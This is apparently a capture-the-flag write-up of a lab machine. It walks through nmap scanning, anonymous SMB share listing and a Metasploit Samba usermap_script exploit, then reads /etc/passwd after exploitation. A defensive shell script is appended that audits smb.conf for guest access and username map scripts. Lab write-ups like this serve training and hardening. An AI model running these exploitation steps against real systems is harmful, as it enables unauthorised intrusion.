This box was xyx
🧽 Initial Reconnaissance
To begin the assessment, I started with an aggressive port scan using nmap.
<Code>nmap -p- -A 10.10.10.3</Code>
🔍 SMB Enumeration
Using smbclient, I checked for anonymous shares:
<Code>smbclient -L //10.10.10.3/ -N</Code>
<Code>smbclient //10.10.10.3/anonymous -N</Code>
💥 Exploitation
<Code>
searchsploit samba 3.0.20
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST YOUR_IP
run
</Code>
✅ Post Exploitation
<Code>
whoami
hostname
cat /etc/passwd
</Code>
🧠 Lessons Learned
This box was a great reminder that basic recon goes a long way.
A misconfigured SMB share and an outdated Samba version were all it took to get root access.
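To turn that lesson into a check on your own servers, here is an added example (not part of the original write-up) that audits an smb.conf for guest-accessible shares and for the `username map script` option that the usermap_script module name refers to. The function names, file paths and sample configuration are constructed for illustration, and it assumes you can read the server's smb.conf.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag smb.conf settings that
# allow guest access or define a "username map script".
# Prints one FINDING line per issue; exit status 1 when anything is flagged.
audit_smb_conf() {
    awk '
    function trim(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return s }
    /^[ \t]*[#;]/ || /^[ \t]*$/ { next }        # comments and blank lines
    /^[ \t]*\[/ {                                # section header, e.g. [tmp]
        section = $0
        sub(/^[ \t]*\[/, "", section); sub(/\].*$/, "", section)
        next
    }
    {
        eq = index($0, "=")
        if (eq == 0) next
        key = tolower(substr($0, 1, eq - 1))
        gsub(/[ \t]/, "", key)                   # whitespace in names is ignored
        val = trim(substr($0, eq + 1)); lval = tolower(val)
        if (key == "usernamemapscript" && val != "") {
            print "FINDING [" section "] username map script = " val; bad = 1
        }
        if ((key == "guestok" || key == "public") && lval ~ /^(yes|true|1)$/) {
            print "FINDING [" section "] guest (anonymous) access allowed"; bad = 1
        }
        if (key == "maptoguest" && lval != "never") {
            print "FINDING [" section "] map to guest = " val; bad = 1
        }
    }
    END { exit bad }
    ' "$1"
}

# Constructed sample configuration, for demonstration only.
write_sample_conf() {
    cat > "$1" <<'EOF'
[global]
   map to guest = Bad User
   username map script = /etc/samba/scripts/mapusers.sh
[anonymous]
   path = /srv/anonymous
   guest ok = yes
[private]
   path = /srv/private
   guest ok = no
EOF
}

sample=$(mktemp)
write_sample_conf "$sample"
audit_smb_conf "$sample" || echo "review the findings above"
rm -f "$sample"
```

A clean result here only covers configuration; the installed Samba version still has to be checked against the vendor's supported releases.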